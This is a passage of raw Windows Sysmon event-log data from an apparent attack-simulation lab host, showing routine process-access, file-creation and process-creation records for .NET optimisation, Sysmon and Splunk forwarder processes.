+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:41.344{59A5CD1D-9141-6005-3C02-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\410-0\SMDiagnostics.dll2021-01-18 13:46:41.344 10341000x80000000000000006373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:41.251{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3C02-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.235{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3C02-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:41.235{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3C02-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3B02-00000000A301}4816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.188{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3B02-00000000A301}4816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.188{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3B02-00000000A301}4816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.141{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3A02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.141{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3A02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:41.141{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3A02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:41.001{59A5CD1D-913D-6005-3902-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1008-0\ReachFramework.dll2021-01-18 13:46:41.001 10341000x80000000000000006399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:44.719{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9144-6005-4102-00000000A301}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9144-6005-4102-00000000A301}4804C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9144-6005-4102-00000000A301}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.720{59A5CD1D-9144-6005-4102-00000000A301}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9145-6005-4402-00000000A301}4632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 